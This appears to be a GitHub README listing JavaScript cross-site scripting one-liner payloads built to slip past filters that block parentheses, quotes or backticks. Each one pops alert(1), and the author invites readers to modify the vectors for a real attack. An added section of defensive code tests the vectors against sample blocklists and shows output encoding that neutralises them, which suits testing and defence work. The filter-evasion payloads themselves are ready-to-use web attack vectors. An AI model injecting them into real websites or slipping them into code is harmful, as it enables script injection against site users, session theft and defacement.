dsopas/XSS-oneliner-payload

XSS oneliners payloads that rocks your nuts!

This is a list I often use as a reference tool, which I decided to publish. If you want to contribute, you're welcome; just tweet me at @dsopas or something. Critics are always welcome!

BTW: the result is always to alert the number 1. If you want to do a real attack scenario, just modify the vectors below.

Without parentheses and quotes

self[0X10f8809.toString`36`]`1`

PS: You can also use top instead of self to cut down 1 char.

Online: https://jsfiddle.net/hx7kypv6/ by @aemkei

x=alert,x`1`

Online: https://jsfiddle.net/0bp4b2mf/ - don't know really...

Without quotes or backticks

Object.bind(null,alert)()(1)

Online: https://jsfiddle.net/w99tv481/ by @garethheyes

Eval without eval() and without quotes

atob.constructor`alert\`1\````

Online: https://jsfiddle.net/r4tdhs1L/ by @aemkei

Other evading payloads

Function('x=alert`1`','y')()

Online: https://jsfiddle.net/qawpegx9/ by @garethheyes

/1/[Symbol.replace]('1',alert)

Online: https://jsfiddle.net/7m9ex6L8/ by @garethheyes

Array.from([1],alert)

Online: https://jsfiddle.net/ck5v3zgk/ by @garethheyes
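
For defenders, the vectors above make a compact regression corpus. The following is an added example, not part of the original list or the author's code: it runs the page's seven vectors against three hypothetical blocklists (the regexes and all function names are assumptions) and then shows script-context output encoding, which leaves every vector as inert string data.

```javascript
// Constructed corpus: the seven vectors listed on this page, verbatim.
const VECTORS = [
  'self[0X10f8809.toString`36`]`1`',
  'x=alert,x`1`',
  'Object.bind(null,alert)()(1)',
  'atob.constructor`alert\\`1\\````',
  "Function('x=alert`1`','y')()",
  "/1/[Symbol.replace]('1',alert)",
  'Array.from([1],alert)',
];

// Hypothetical character/keyword blocklists of the kind these vectors evade.
const BLOCKLISTS = {
  noParensOrQuotes: /[()'"]/,
  noQuotesOrBackticks: /['"`]/,
  noAlertOrEvalCall: /\b(?:alert|eval)\s*\(/i,
};

// Vectors that a blocklist lets through unchanged.
function bypasses(blocklist) {
  return VECTORS.filter((v) => !blocklist.test(v));
}

// Script-context output encoding: emit untrusted input as a JS string literal.
// JSON.stringify handles quotes and backslashes; <, >, & and U+2028/2029 are
// escaped as well so the literal cannot close the surrounding <script> element.
function toScriptLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'),
  );
}

// Evaluate the encoded literal with a counting alert stub: the input must come
// back unchanged as a string and the stub must never be called.
function staysData(value) {
  let calls = 0;
  const literal = toScriptLiteral(value);
  const out = new Function('alert', 'return ' + literal + ';')(() => { calls += 1; });
  return calls === 0 && out === value;
}

function report() {
  const rows = Object.entries(BLOCKLISTS).map(
    ([name, re]) => `${name}: ${bypasses(re).length}/${VECTORS.length} pass`);
  rows.push(`encoded as data: ${VECTORS.filter(staysData).length}/${VECTORS.length}`);
  return rows;
}
console.log(report().join('\n'));
```

No single blocklist stops the whole corpus, while encoding for the output context neutralises all of it; a Content Security Policy that disallows inline script is a useful second layer.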

Resources

Talks
